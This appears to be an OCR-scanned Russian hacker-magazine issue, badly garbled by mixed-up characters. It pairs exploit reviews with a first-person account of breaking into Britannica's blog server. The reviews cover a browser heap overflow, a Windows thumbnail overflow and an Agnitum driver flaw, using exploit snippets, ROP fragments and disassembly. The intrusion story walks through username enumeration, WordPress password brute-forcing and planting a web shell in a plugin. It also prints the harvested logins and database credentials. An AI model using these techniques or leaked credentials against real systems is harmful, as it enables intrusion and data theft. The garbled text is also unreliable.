<ХМЬ Ір="хт1ісі1"> 

<Беѵісез> 

<Беѵісе> 

<НегеІзСои1сІВеАпуВаЦа /> 

</Беѵісе> 

</Беѵісез> 

</ХМЬ> 

Во-вторых, каксделать, чтобы в кэш попадала какая-то информа- 
ция для форсирования записи данных за границы выделенного 
буфера? Для этого идеально подходят методы объекта ВесогбЗеО 
МоѵеРігзІ, МоѵеЫехІ; и так далее. Этот факт позволяет нам контро- 
лировать ход перезаписи памяти, так как мы уже имеем полный 
контроль над размером буфера и над тем, что пишем. 

Автор данной уязвимости Питер Врегденхил использовал выше- 
описанное для очень интересного трюка — утечки памяти с целью 
обхода А5І_В. 

На картинке выше: 

• темный цвет — буфер кэша: размер под контролем атакующего; 

• зеленый цвет — строка, выделенная в Ьеар'е, коричневый цвет 
— завершающие 2 0x00 байта; 

• красный цвет — объект С++, с первым йѴѴО В й темно-красного 
цвета. 

Если добиться такого расположения объектов в памяти и затереть 
нулевые байты строки, а затем через баѵаЗсгірІ: прочитать ее 
содержимое, то мы в конечном итоге наткнемся на 0x0000. Чтобы 
иметь возможность переписать память байтами 0x0000, надо со- 
здать очень много записей — более 0x00010001 . Ноне торопись: 
ведь после удаления какой-либо записи следующая новая запись 
получает инкремент идентификатора. Таким образом, создавая и 
удаляя записи в цикле, можно быстро добиться нужного значе- 
ния: 



ІипсСіоп ІпсгеазеКомСоипДег ( ) 

{ 

іі (СІоЬаІКомСоипЪег < 0x10120) 

{ 

1ог(і =0; і < 0x300; і++) 

{ 

С1оЪа1КомСоип±.ег+ + ; 

1оса1хт1ісі2 . А<ЗсШем( [ " ВВВВ" ] , [ " с" ] ) ; 

1оса1хт1іс12 . БеІеСе ( ) ; 

} 

ѵаг регсепСсотрІеСе = МаЪЬ. . гоипсі ( 

СІоЪаІКомСоипСег /0x1012 0 * 100) ; 

(ТосишепЦ . деЦЕІетепЦВуІсІ ( 

' ргодгеззіазеопе ' ) . іппегТехЦ = 
регсепСсотрІеСе + 

міпсісж. зеСТітеоиЦ ( ІпсгеазеКоѵ^СоипСег , 100) ; 

} 

} 

Стоит отметить, что авторский эксплойт огромен: он использует 
сразу две уязвимости (втом числе описываемую именно с целью 
обхода А5І_В), что ведет к возможности обойти РЕР путем выстраи- 
вания ВОР- последовательности. М во. б II использует стандартную 
функцию ѴИиаІРгоІесІ:, с помощью которой маркируется память в 
том месте, где локализован наш шелл-код как ЕхесиІаЫе. Вторая 
уязвимость класса изе-аІНег-Ітее (СѴЕ-201 0-1 262) была запатчена 
еще в пп51 0-035. Отличный пример, когда комбинация из двух уяз- 
вимостей увеличивает эффективность успеха эксплуатации! 

Патчем же является использование проверочной функции, которая 
выполняет умножение и проверяет результат на переполнение. 



юштюы 



Накати патч тзі 1-002: тісгозоІІсотЛесбпеі/зесигіІѵ/ВиІМіп/МЗІ 1 - 
002.тзрх 
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Тех! 













ІіЦ 



АТІ 5 АРЕ АШЭСА ІМРІ : 



_ѴігІиаІРгсІес!@1 6; Ѵіі*иаіР*о*есфл,х,х) 



ЦІО... г АТІ: :_АТ^5 АРЕ_АІШСА_ІМ РБ : .. + саІІ ітр Ѵіг(сіаІРгоІес(@16; ѴііІиэ1Ргэ(есІ[я,х,х,х) 



Е1І 



Ш 



ок 




СапсеІ 




Неір 




беагсРі 



Какой-то АП-компонент использует ѴігіиаІРгоІесТ 




ипБІ^пгіІ ■ 



паи #лм р 

ріІ5І1 Ц 

«СЧ 

тіі «ск 

ішл Яй* г [ѵ&р+ісій] 

ріі5іі вех 

рліі ііік 

рУ5И> ; цизАдпн! _Іпм* 

с 5РІ1 то пді^ пдТ л іаі л 7 III опдІ.інідТі»1 

лііб сір г КЗі 

***. г-ат 

Л 1вс_Ь&Е1й№ 

\ і 



ЛрИсШ] 

+ОРО0ОП 

^ьш'лрн.лгігіігічгарйхл: Уйій 

і : і рр^мріі рлрй 1 1 іс 

Л.іфСІЙМЭ 

[ 



д_лІірл^І«апгПг 



Слева — уязвимый код слепо умножал на 4, справа — патченый сперва делает проверку 
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УДАЛЕННОЕ ИСПОЛНЕНИЕ КОДА 
В /V» БОРТ 6РАРНІС5 РЕЫОЕкІЫб 
ЕЫОІЫЕ 

іИЕЯИ ѴѴіпсІоѵѵз ХР, 2003, Ѵізіа 

ІИгЛЧЗ 

Графическая подсистема ѴѴіпсІоѵѵз часто преподносит сюрпризы 
в области безопасности. На конференции РОС20Ю Моти & Ксу 
Ха о выступили с докладом всего лишь про одну уязвимость, зато 
какую! Как известно, Ехр Іо ге г может отображать файлы по-разно- 
му, к примеру: если выбрать стиль отображения «Эскиз», то будут 
отображаться некоторые метаданные файла, а информацию о 
содержании (к примеру, бос- или рсіі'-документа] он берет из 
обыкновенного битмапа, присутствующего в файле. 

Эта структура обрабатывается с помощью функции 
СопѵегШІВ5ЕСТІ0І\ІТоТНитЬпаіІ библиотеки зЫтдѵѵѵ. 

611, которая, в свою очередь, вызывает функцию 
СгеаІеЭігесШІВЭЕСТІОІМ. 



. ВехВ : 5Б0201Е5 
. ВехВ : 5Б02 01Р6 
. ВехВ : 5Б0201Е7 
. ЕехЕ : 5Б020ІЕА 
. ЕехЕ : 5Б020ІЕВ 
. ЕехЕ : 5Б020ІЕС 
. ЕехВ : 5Б020ІЕБ 



ризЦ 

ризіі 

ризіі 

ризіі 

ризіі 

ризіі 

Іеа 



е<±х 

есх 

[ еЬр+агд_8 ] 

езі 

есх 

еах 



іпВ 

іпВ 

іпВ 

іпЕ 

НРАБЕТТЕ 

іпЕ 



еах, [еЬр+ѵаг_10] 



. ВехВ : 5Б02 02 0 0 ризЬ. еах ; іпР 

. РехР : 5Б020201 саІІ _СгеаРеЗі гесІВІВ8ЕСТІОЫ@2 8 

Функция СгеаіеЗігесЮІВЭЕСТІОІМ обрабатывает ЬіСІгІІзеб как 
знаковое значение (зідпеб). Рассмотрим уязвимый код: 

. РехР : 5Б01ЕС2Б 1ос_5В0 1ЕС2В : 

. РехР : 5Б01ЕС2Б стр есх, ЮОЬ. 

; в есх значение поля ЪіСІгІІзесІ 
. ВехВ : 5Б01ЕСЗЗ зд 1ос_5Б01ЕСЕ0 
; Знаковое сравнение! ! ! 

. РехР : 5Б01ЕСЗ 9 Іеа езі, [ес!х+28Ь] 

. РехР : 5Б01ЕСЗС Іеа есН , [еЬр+ѵаг_43 0 . ЬтіСоІогз ] 

. РехР : 5Б0 1ЕС42 гер тоѵзі ; іпііпе тетсру 

Из листинга видно, что если в есх отрицательное значение, то 
мы обойдем проверку с константной длиной буфера, располо- 
женного на стеке, тем самым форсируя переполнение. Прак- 
тическая ценность этой уязвимости весьма велика, так как с 
помощью ѴѴеЬйаѵ можно атаковать Іпіегпеі Ехріогег. Рассмотрим 
локальный сценарий: насзаманили в директорию, гдележит 
файл со специально сформированным эскизом. В этом случае 
переполнение происходит в процессе Ехріогег.ехе, что дает пре- 
имущества при эксплуатации на ѴѴіпсІоѵѵз ХР, так каку процесса 
Ехріогег.ехе флаг РЕР установлен не в режиме рента пепі. Из-за 
этого с помощью РОР-цепочки можно отключить йЕР, используя 
ЭеіРгосеззВЕРРоІісу или ѴігІиаІАІІос с РѴѴХ флагом. 
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^урейе'Г 


«ІЧІСІ ГййВІТНАРІМРОНЕАОЕЯ { 


ОЫСНШ 


ЬШзе; 


ЮН6 


ыиіасй; 


ионе 


ьінеівМ; 


НОМ 


ЬіРІапеь; 


ыойо 


ЬіВіЛСоип* ; 


ШШ 


ЬІСотрге55Іоп; 


оыояо 


Ы^ізеХліаее; 


ІОМЗ 


ЬіХРеІ5РегМе1;ег; 


юмс 


ЬіѴРе1$РегМе4ег; 


1 ОЫОКО 


ЬіСігКьрй; | 



ОЫОЙР БЮ1гІщрогсапт:і 
> ВІТМАРІМРОНЕАОЕК, ^РВИИАРМРОНЕДОЕН; 



Структура, описывающая эскиз 

Рассмотрим пример отавторов теіазріоіі'а: 

# формирование стека 

* ітр_ѴігЕиаІАІ1ос ' , 

' саіі [есх] / рор еЬр / геЕ 0x10' , 

0, 

0x1000 , # размер 

0x3000, # 

0x4 0, # ВЖХ флаг 



50ШТІ0И 



Ознакомься софициальнойадвизориотМ5,там есть Ріхіі- ре- 
шение. Либо запрети подгрузку уязвимой ОН путем нехитрой 
команды : есЬо у I сасіз %ШШБІК%\8У8ТЕМ32 ХзЬішдѵвд. сЗ.1 1 /Е 
/Р еѵегуопе : N 



N№6 

'Ш 

ЗЪ ! гіѣэдеѴ Дк* ? *гА 

Ій 

ІЙ Іігцд^Л*«_ЙііпіІ:Т з 
ИЬ ІгіЧ9в^ь5^Рііг^Т сА 

ІЙ а^іѴ 

» Й ітад№ѵів^_(і**сге«Л^ 

ПН 



СопѵітіЦІЁ&ЕСІ іи Г I ЕоТІ*ліЬг-.?и] 



ЕХРЮІТ5 

КЕѴІЕѴѴ 



МЫ ОпМ 
50ЮЭРСА 1 
50С08888 2 
50008380 3 

зоосезсг 4 

500С8Д6Г 5 
5000БВ4Р 6 
50008 ВМ 7 
500089С2 8 



50и;еіХі€€ э 



ІО РСкіСІ4іЮЬІ«сі 
ЙЭ Оіліілі 
[ й ОЙедІаІегбЕіѵчг 
ЙЬ ОІІгніеріІеДяѵв 

- Л П И і «і ..ь 




500ШВС 
500130$* 
50018810 
5001 АЗЕ 7 
5001 ДАМ 

ЕГІСіІОПЛ 


Экспортные функции 




. ЕехЕ : 0002В850 


Ігр = 


сЕлгагсі рЕг 8 


. ЕехЕ : 0002В850 


ризЬ 


езі 


. ЕехЕ : 0002В851 


ризЬ 


есіі 


. ЕехЕ : 0002В852 


шоѵ 


есіі, [езр+8 + Ігр] 


. ЕехЕ : 0002В856 


ІТЮѴ 


еах, [есІі + бОЬ] 


. ЕехЕ : 0002В859 


шоѵ 


есх, [еах+4] 


. ЕехЕ : 0002В85С 


шоѵ 


езі, [еах+8] 


. ЕехЕ : 0002В85Р 


шоѵ 


есЬс, [есІі + ОСЬ] 


. ЕехЕ : 0002В862 


шоѵ 


[езр+8+Ігр] , есх 


. ЕехЕ : 0002В866 


шоѵ 


сідаюгсі рЕг [есіі + ІСЬ] , 0 


. ЕехЕ : 0002В86Б 


ШОѴ2Х 


есх, ЬуЕе рЕг [еах] 


. ЕехЕ : 0 0 02В87 0 


зиЬ 


есх , 0 


. ЕехЕ : 0 0 02В87 3 


02 


1ос_2В97Б 


. ЕехЕ : 0 0 02В87 9 


зиЬ 


есх , 2 


. ЕехЕ : 0002В87С 


02 


1ос_2В9 67 


. ЕехЕ : 0002В885 


02 


зЕюгЕ 1ос_2В8А0 



; есх == 0х0Е (ІОСТЬ) 



ПОВЫШЕНИЕ ПРИВИЛЕГИИ В 
А6ІЧІТІІМ ОІЛРОБТ БЕСУРІТѴ 
БІІІТЕ РРО 

ШИ 

Адпііит Оиірозі; Зесигііу Зиііе Рго и все продукты Адпііит, име- 
ющие в комплекте уязвимый драйвер ѴВЕпдІЧТ.зуз 

іиама 

В процессе поиска багов автор столкнулся с довольно интерес- 
ным архитектурным багом: разработчики данной НІР5-системы 
защитили все свои псевдоустройства, кроме одного. Этот модуль 
играет роль своего рода ОН только в пространстве ядра. НапсИе 
на псевдоустройство \\ А ѵ Ь е п д п 1; может получить права Ѳиезі и 
с помощью определенных іосН-запросов переписать память по 
любому адресу в пространстве ядра, что ведет кочень простому 
сценарию эксплуатации. Что примечательно, іосИ-запросы ведут 
к прямому вызову экспортных функций, без какой-либо проверки 
указателей. 

Учитывая, что экспортных фукнций у данной 611 аж 50 - соответс- 
твенно количество уязвимостей тоже 50. 

Все эти функции обрабатывают параметры какуказатели на 
определенные недокументированные структуры, не выполняя 
никаких проверок. Рассмотрим дизасм и определим самый прос- 
той сценарий эксплуатации. 

Іосіі обработчик\\ДѵЬепдпІ 

. ЕехЕ : 0002В850 іосЕ 1_Ьапс11ег ргос 



Далее идет проверка значения ІосИ-кода на определенный диа- 
пазон И ВЫЗОВ уязвимой функции: 



ЕехЕ : 0002В8А0 


1ос_2В8А0 : 






ЕехЕ : 0002В8А0 


шоѵ 


еах , 


[еах+ОСЬ] 


ЕехЕ : 0002В8АЗ 


шоѵ 


есх , 


еах 


; в еах значение ІоСЕІ 


кода 




ЕехЕ : 0002В8А5 


зЬг 


есх , 


2 


ЕехЕ : 0002В8А8 


апсО 


есх , 


0Р00Ь 


ЕехЕ : 0002В8АЕ 


сшр 


есх , 


8 0 0Ь 


ЕехЕ : 0002В8В4 


02 


зЬогЕ 


1ос_2В8СБ 



[ . . ] 



ЕехЕ : 0002В8СБ 


1ос_2В8СБ: 






ЕехЕ : 0002В8СБ 


Іеа 


есх , 


[езр+8+Ігр] 


ЕехЕ : 0002В8Б1 


ризЬ 


есх 




ЕехЕ : 0002В8Б2 


ризЬ 


езі 




ЕехЕ : 0002В8БЗ 


ризЬ 


есіх 




ЕехЕ : 0002В8Б4 


ризЬ 


еах 




ЕехЕ : 0002В8Б5 


саіі 


ѵи!п_ 


_ЕипсЕіоп 



Функция по адресу 0x0001 РААО является своего рода шлюзом: 

. ЕехЕ : 0 0 0 1БАА0 ѵи1п_ЕипсЕ іоп ргос пеаг 
. ЕехЕ : 0001БАА0 агд_0 = йкогв. рЕг 4 
. ЕехЕ : 0001БАА0 агд_4 = сіѵтогсі рЕг 8 
. ЕехЕ : 0001БАА0 агд_8 = сОчлгагс! рЕг ОСЬ 
. ЕехЕ : 0 0 0 1БАА0 агд_С = сЬлгагс! рЕг ІОЬ. 
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ВехВ : 0001ВАА0 








бехб : 0001ВАА0 


шоѵ 


еах , 


[ езр+агд_0 ] 


ВехВ : 0001ВАА4 


зЬг 


еах , 


2 


бехб : 0001ВАА7 


ризіі 


ебі 




Вехб : 0001ВАА8 


шоѵ 


ебі , 


[езр+4+агд_С] 


ВехВ : 0001 ВААС 


шоѵ 


есх , 


[ебі] 


бехб : 0001ВААЕ 


апб 


еах , 


ОЕЕЬ. 


бехб : 0001ВАВЗ 


сшр 


еах , 


32Ц 


ВехВ : 0001ВАВ6 


шоѵ 


бѵ^огб рВг [ебі] , 0 


бехб : 0001ВАВС 


3 ь 


зЬогІі 


1ос_1ВАС7 



[ . . ] 



. ВехВ : 0001ВАС7 1ос_1ВАС7 : 

. ВехВ : 0001ВАС7 шоѵ ебх, [ езр+4 +агд_8 ] 

. ВехВ : 0001БАСВ сшр ебх, бчлгагб_4 5 418 [еах*4 ] 
; сравнение с правильными длинами 
. ВехВ : 0001БАБ2 р 2 зЬогВ 1ос_1БАВБ 

[ • . ] 



бехб : 0001ВАЕВ 


1ос_ІВАЕВ : 




бехб : 0001ВАЕВ 


сшр 


еах, 3 11т ; 


зѵ^іСсЬ 50 сазез 


ВехВ : 0001ВАЕЕ 


ризіі 


езі 




Вехб : 0001ВАЕЕ 


За 


1ос_1Е18 6 


; бебаиШ 


Вехб : 0001ВАЕЕ 




; пишрбаЫе 


0001ВАЕ5 сазе 3 


бехб : 0001ВАЕ5 


3 шр 


бз : оіі_1Е19 0 [ еах* 4 ] 


; развилка 


на вызовы пятидесяти функций 



После перебора пятидесяти функций обнаружилось, что с помо- 
щью функции ЕЫѲІМЕ_ХппІМ5дЕппрІу можно переписать любую 
память константными значениями: 

. ВехВ : 0001ВВРС шоѵ езі, [ езр+8+агд_4 ] 

. ВехВ : 0001ВС00 шоѵ еах, [езі] 

; езі — наш буфер 

. ВехВ : 0001ВС02 ризЬ. еах 



. ВехВ : 0001ВС03 саіі ЕЫ0ШЕ_Хт1МздЕшрВу 



ВехВ : 0 0 0 1В2 0 0 


ЕВСІЫЕ_ 


_ХшІМздЕшрВу ргос пеаг 


ВехВ : 0 0 0 1В2 0 0 


агд_0 = 


сВлгагб рВг 4 


ВехВ : 0 0 0 1В2 0 0 








ВехВ : 0001В200 


ризЬ 


езі 




Вехб : 0001В201 


шоѵ 


езі , 


[езр+4+агд_0 ] 


Вехб : 0001В2 05 


ВезВ 


езі , 


езі 


ВехВ : 0001В2 07 


З' П2 


зВюгВ 


1ос_ІВ2 12 


• • ] 

ВехВ : 0001В218 




абб 


езі, 14Ь 



; езі под нашим контролем 



. ВехВ : О О 0 1В2 ІВ ризЬ. езі 

. ВехВ : О О 0 1В2 1С саіі зиЬ_37650 

. ВехВ : 00037650 зиЬ_37б50 ргос пеаг 

. ВехВ : 00037650 агд_0 = бѵюгб рВг 4 
. ВехВ : 00037650 



. ВехВ : 00037650 


шоѵ 


еах, [езр+агд_0] 




. ВехВ : 00037654 


шоѵ 


бчлгагб рВг [еах+14Ь] , 


0 


; запись 0x00000000 по произвольному адресу 


. ВехВ :0003765В 


шоѵ 


бѵѵогб рВг [еах+20Ь] , 


1 


. ВехВ : 00037662 


абб 


еах, 28Ц 




. ВехВ : 00037665 


шоѵ 


[езр+агд_0], еах 




. ВехВ : 00037669 


З т р 


пи11зиЬ_1 




. ВехВ : 00037669 


зиЬ_37650 епбр 





ІОШТІОЫ 



Ждем исправления или перебираемся на другой 
НІР5. щ 



Получен НапсІІе! 



ІІ Кймли.'ІІііШ СІрйаІ д ІйСЕІ І1Г77КГ.еи ѵЬ^І^ПЕ 

ІС і ''Иве 1 ' I I ЧЕ ЕС Г—ЁЙ1 1 ѴІЮ I СА5С ^І.ОС Ь І—ГшСЕ ГГ . С ЯС СІ ы 

ІіпсВІ Ьу НікіСіі ТдгдЬяішм 

ЕЕрі+й рі Е^г-шг- й]і^п ігі^ ЛйіНсй Ѵ\ . Ча І іг 

: \ртв\ іі і*с 1 1 _ Г иг ас 1 V Кс ірлчс >іас! 1 _і и іге і? г . с хе л І ч^псі іті 

іа п х. ] Гижвег Ъу Тігіінпоѵ 

Е'ті'йі 1 з Еѵтгог сіініп іпіг ^ е ѵ іс с ^ЧЛ&ГміАІй 

К ; \упг.\ і ПС! 1 1 _1 117 ЯГ г_2В I 3 \ Ві' 1 ПЛ5ІГ И оч Ы _І и С Г - с и Ьг г^п Ь 

Ііаст.1 Ьу НікіГА ТтІІПйи 

іОйѵігй \Л_\иІИ!п*|ПЕ с ис с.*ь Г и 1 1 и оіннпні.1* 

|лп. I. ] Гім.м.І'ТІ . 13 .:± Ь - пптяшія 
І/Г г гвіигпгчі ЕЗхЛі 
пои 1 1 Гпііпіі*?* іос*1 - ЦЩ][*2[Ш9 

= г«№гпей ЦхЛ 

Паси ГвшніШ іасьі - ОМШМЙ 

||-| «/С. гг гнІЕіггігіІ (]>:■!■ 



_І*]Х] 



I* 



Гк^***,, 

Е 

Г.нэ» 

Р.КИ5ТАП 

^№№ГІП 

|іРчэ»оѵѵ 
;Р р агтен... 
Й РОіѵЕй.., 
МА 
Лрті 
И іточим... 
|«мт 

^ртиші 

Г^твіжг 

^РТйИК 

Р.КЛыІ 

Р!и*ы>*.., 

Яте* 






Тур* 

УѵпФі*и* 

КушЬвкУПН 

іупФЛи* 

ЕуЯІИІСІіік 

БѵттМй^К 

іуШЬйМійк 

ЪгпШ и* 
ЕутпМсий 
ІутЪЩігк 

Зѵ4гФХ*к 

ЗтТЛОнКип 

гупФокиж 

>уП1Впиіі1Ві 

ЭуТитиРі 

&упМй№к 

г, -у и «.Іи 5 ! я»іЬ 

■др НИ КИП Шл Ц 

р, ■ ■ 1 . . к ■ ■ ьД 

ЗуПіННкІіЖ 

БшйнЫрк. 

■у, — 

:- г мнмі4а I Гг> 

і , ,,,|,,л, I -X 
-ИгШтІі'г* 



ЗупіМ. ■ 

Ц>гѵ>-* ІЫЛЮш&і*- 

Чрр™>«*т 

|ргт^№ѵѵ*і 

|р*ѵтс^1№Рг&^ 

Т«МмО- 
І |Е 1 *ѴЧв І р Р V ТнЫпі 2 
4ЫМ4Р 

ІСЕЯІЖягіРС 



# 1 ДПГІ- 8 - С. -ИАІЦЦІ ^І а 4 і Ы"Цщ.".ІІ Г-У-Т 

™впыл ЭппТІОвіСиІЛі ЧьЧГгК , о ^тіштт I 
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5ёмд зато 



ВСЕГДА ВАШ, 5 II ВДВ II 



токийский АВТОСАЛОН : 1 №ЮЕ бЕЗѵмит’ 



ЖУРНАЛ ДЛЯ ТЕХ, 
КТО ЗАМЕТЕН В ПОТОКЕ 



ТЕСТ &Г ІРО Г НУ ЦАНАР 1ИН» 








взлом 



■ ■ М4д і с я 884888, зпіррег.ги 




БРИТАННИКА ПОД 

КОЛПАКОМ 

Взлом знаменитой оффлайн-энциклопедии 



■» Энциклопедия Британника -это старейшая и наиболее полная 
энциклопедия на английском языке, первые тома которой были изданы в 
далеких 1768-1771 годах. Ее сайт впервые увидел светв 1995 году, а в 
данное время вплотную приближается по возможностям к Википедии. Я 
просто не смог пройти мимо этого эпохального труда и попробовал 
взглянуть на онлайновую Британнику немного глубже, чем ее обычные 
пользователи. 



Знание — сила 

Зная, что любое энциклопедическое изыскание начинается аЬ 
оѵо, я зашел на главную страницу Британники, расположенную 
по адресу Ьгііаппіса.сот (или еЬ.сот). Первая ссылка, которая 
меня заинтересовала, незатейливо называлась В Іод и вела 
на Ьгііаппіса.сот/Ыодз . Открыв исходник данной страницы, я 
пришел в восторг, так как там гордо красовалась следующая 
надпись: 

сшеСа паше= " депегаСог " сопСепЦ= "ШогсІРгезз 2.2" /> 

Но, как и следовало ожидать, админы Британники оказались 
не такими уж и простаками: хотя версия движка и была крайне 



древней, все известные уязвимости в ней были хорошо пропат- 
чены, так что оставалось только продолжать поиски. 

Следующим моим шагом был, конечно же, Гугл: «іпигГЬгіІаппіса. 
сопл Гіеіурефбр». Походив часа два по ссылкам и снова ничего 
интересного не найдя, я все же решил заняться Вордпрессом. 

Грубая сила 

Немного поразмыслив, я задумал коварный план по подбору 
пароля в админскую часть Вордпресса с помощью банально- 
го брутфорса. Для осуществления данного плана требовались 
действительные логины пользователей, которые можно было 
собрать с помощью известного бага движка: переходим по 
ссылке ЬгіІаппіса.сот/ЬІод5/?аиіЬог=[І\І] ([І\І] — это Ю нужного 
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Инжект шелла в плагины 




Шелл на Британнике 

пользователя) и наблюдаем логин в тайтле страницы. 
Подставив по порядку несколько Ю, я узнал, что на 
блоге присутствуют следующие юзеры: 

асітіп, тіеѵу, сДюіЬегд, 

ПІиеЬегіпд, пЬ.еппе11у, 
тлДюзск, ккиірег, крарраз , 
гтскепгу, дтспатее, гкюггом, 
кот, Ьсоздгаѵе, кдаііадкег, 
гтиггауккютаз , пеппікег, 
кзрагкз, адикктапп, 
птадиіге, гміізоп 

Но логины — это только полдела, необходимо было 
найти еще и пароли к ним :). Для этого я воспользо- 
вался ранее упоминавшейся на страницах рубрики 
Х-Тооіб программой ѴѴВР.боШ І ѵѵопІесІ.ги/ргодгаттБ/ 
ѵѵЬб-доІсІ ). Для начала процесса брутфорса нужно 
настроить прогу в разделе «Параметры»: 

Хост/обработчик формы: Цккр ://ѵіѵт. 

Ьгікаппіса . сот/Ыодз /ѵ^р-іодіп . ркр 

Метод атаки: РОЕТ 

Атрибуты ЗиЬті к -кнопки: Ыате=ѵ\гр-зиЪтік , 
Ѵа1ие=Ьодіп 

Имена полей идентификаторов: поле 
" Логин" =1од , поле " Пароль " =ржІ 
Индикация успешного входа: отсутствие тек- 
ста іприк куре= "разз^огсЗ" 

Для начала я скачал несколько объемных словарей 
по ссылке іпзісІерго.сопп/гиз/сІоѵѵпІоасІ.зЫппІ и начал 
последовательную атаку по первому аккаунту с помо- 
щью сразу нескольких запущенных одновременно 
копий брутфорса. Спустя какое-то время я увидел, 
что успешно сбрутился аккаунт тіеѵу с паролем 
І_опсІоп :). Дело оставалось за малым — залогиниться 
в админку и залить шелл, чем я и занялся. 




нистратора, я поспешил проследовать в раздел 
«Ріидіпз». Здесь мне снова повезло — все плагины 
обладали правами на запись, так что я открыл файл 
акізтеі/акІБтеІ.рІпр и записал в него свой веб-шелл. 
Теперь нужно было изучить сервер на предмет вся- 
ческих интересностей. Для этого я зашел в свой 
шелл с помощью кодового слова [ Ьгііаппіса.сот/ 
ап ) и стал смотреть на список файлов и 
директорий веб-сервера в корне (/а ррз/сі осб) : 

ассошік-443 

ассоипк-80 

ЪепапсПэеІІа 

Ъіпсііа 

Ыод . да . каг . Ът.2 
сакаіод 

сакедогу-кетріаке . ркр 
сопкгіЬиког 
согрогаке-80 
(Зеасі. Іеккег 

(ЗергесакесЗ_зіке_радез-80 

сЗеѵ-Ыод-ѵѵр22 . 2 Ір 

каііоѵег 

когт01-80 

когтз01-80 

дсоор-80 

ке1р-80 

кккрсі-асіѵосасу 

кккрсі-заке-443 

кккрз-199 

ѵгогсіргезз-Ыод-8 0 
ѵтрріпдЬаск- 8 О 
шт- 80 

На сервере находились служебные файлы различных 
внутренних разделов и поддоменов Британники (кото- 
рые, впрочем, были для меня не так интересны, как 
доступы к базам данных): 

/аррз/(1осз/тоог(1рге53-Ыод-80/Ыодз/ 

ѵтр-сопкід.рЬр: 



Проникновение 

Итак, зайдя в ЬгіІаппіса.сот/ЫодБ/ѵѵр-асІтіп и убе- 
дившись, что юзер тіеѵу обладает правами адми- 



сЗекіпе ( 1 БВ_ЫАМЕ ' , 'Ыодз'); // ТЪ.е паше ок 
кЪ.е сіакаЬазе 

сіекіпе ( ' БВ_ІІЗЕК ' , ' ѵ^огсЗргезз ' ) ; // Уоиг 




> іпіо 

Если ты являешься 
разработчиком 
ка кого-либо 
движка или 
администратором 
крупного проекта, 
советую тебе 
оглянуться на 
безалаберных 
владельцев 
Британники и не 
повторять следующих 
ошибок: 

1 . Не забывай 
обновлять паблик- 
движки до самых 
последних версий. 

2. Никогда 
не сохраняй 
личные данные 
пользователей в 
открытом виде. 

3. Никогда 
не позволяй 
непривилеги- 
рованному 
пользователю веб- 
сервера (арасбе в 
данном случае) быть 
владельцем важных 
файлов системы. 

4. Никогда не ставь 
простых паролей, 

а также используй 
рандомные пароли 
для различных 
сервисов. 




НТТР://ѴѴѴѴѴѴ 

■і Г 

> Ііпкз 

• Виновник 
торжества: Ьгііаппіса 
сот/Ыодз : 

• Индийское 
отделение 
Британники: Ьгііап- 
пісаіпсііа.сот : 

• Последняя версия 
веб-шелла ѴѴ50: 
ЫірБ://гсІо1.огд/ 
Іогит/зЬоѵѵіЬгеасІ. 
рбр?1=1 085 . 
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Пароли в плейн-тексге 



ВЗЛОМ 



5дІ Ьгдизег 



сііа- пить** й4 га чі 



ш-гт-і (3-1 гпіслг^ « ‘Д. 



ІБ-й-ЕТ ВДВ Сі*> 
«И№ПГ | *Ц 
СйипІір' (ц-Я 

■піьдпс (5-ч"ч; 
лі^іігіфд^ 
яг^гнПнадь ь. (энр 

МГѴПЯ&ГНЭ) 



и5іг_пап& 



йсжі 



^Ьии^йкъ : 3 
«Ьііл^днз-ЭЭ 
«Ьі~п іда 5 4І- 

яаг 

вЬілшаш-ЭД 

ТЕЁГТ 



вьетіі&мга 

ГЁЙТ 



^№>ПН 



ІЛір 

най: 

1**4 



■ І..Г, . V Ь.Л I *3 ЬМР Гц* !«ѵ ІГ„, Ті : СИ И>1СІ «ІЬ_^ [йхЫй^^ г.г/г \ 

:< I ■ •-.:. ЛІ-С Сгоор: 5Ш ■. 40а .г «.■ ;. 

■■ " 1К ^лГп тпіі* I |ІІ г 1 г I ] ПлІРІІтп- ГІИПІі' I и 1 1 “1= 

ЯІ 43 «І-В Игр. П.ІЗСВ -I 7 І "А. V 

/ 11-Ыгч-С0іЪ^ді/*С'^^^г^5..і'іч, І 1:г ,>пігі-.Л1іідгг^ч Г Г>- - . : ■ . : ■ ■ | Ы>^ * 



[ Ь*і ЕігГ» Зі ІРі№| ЦСир^Ыя] [ міі ] I Ніи 1 ( ЬІі пу 'І'Ллг 1 ^ КмЛя^иі ш ] [ ГійЕі'ш** | [ Ьиу.чЛ ] | ЬиЙ 



Ы* ь гоѵиіег 



гуд* мне іи^ ^д-а*»ягагі 

|ЬИ ~~ | |^і~" О Г ЙЭ И шцп<=Дг * ГЫПЛШГ Ы ійт В 



ТйВІм: 

П^Ь'.М_ргікілИ5 
П ^іііх-Лгіпъ. іи ігчзрі 


ІЫ ргчі&г гпліііс 15*!, гю^г^І^Рас* * ^ 


] ^ 9 Гі«А( 








II I ■ _ і іі- 1* ■ и і и і!ііч 


й!іірг и іИпі іи. 1 іИі ііііі в ;І л!-.і _ 


ЫІ^іфін* 




ІиП^^іГші 


1іЦ т иіТ.ІІ 




П отсі и-»:- 
П шнйлъ* « і 

□ ■1 ■ ■ См: ■ :і\ 


й 2к 


7Ш-Ч-12-ЗД зът. и 


і'-иі-.аг 1 - 


іі 

&1МЧГ1 . 
Пгіцй-іѵ.^, ииіи 


л і 4 


^ійіі ЬЬйтйИВдтіі' сог, і 


РгИйЛ 



Таблица с заказами продукции Британники 



МуЗСЩ изегпате 

сіеііпе ( ' БВ_РАЗ 8ѴГОШЭ * , 1 дикепЪегдБ ! ' ) ; // • • • апсі 

раззілгогсі 

сіеііпе ( 1 БВ_НОЗТ 1 , 'Ыодз.сШ'); // 99% скапсе уои 
жт'Ц пеесі Во скапде ВМз ѵаіие 

/аррз/сіосз/Ьіпсііа/сосіеІіЬгагу/іпс/соппесВіоп.рІір : 

$сПэСопп = рдщосоппеск ( "ЬозШЬі . сІЪ рогВ = 5432 сПэпате=Ъі 
изег=Ъі раззѵгогсІ=Ьі " ) ; 

С помощью первого доступа я легко слил е-таіГы, логины и 
пароли пользователей блога (обрати внимание, интересные 
пароли у британских книголюбов: Иоганн Гутенберг — это изо- 
бретатель книгопечатания), а вот для второго мне пришлось 
заливать уже знакомый тебе ѴѴ50 веб-шелл, который умеет рабо- 
тать с базами данных РозІдгеБС!І_. 

Индийская Британника 

Подконнектившись к Ьі.бЬ, я сразу же приступил к изучению 
содержимого БД нашего юзера: розідгез, іГіор, Ьі, аазі, зііе, 
еЫітеІіпе, Ьі I. Первые интересности обнаружились в таблице 
1Ы_огс1ег_таз1:ег, где находились следующие столбцы: 

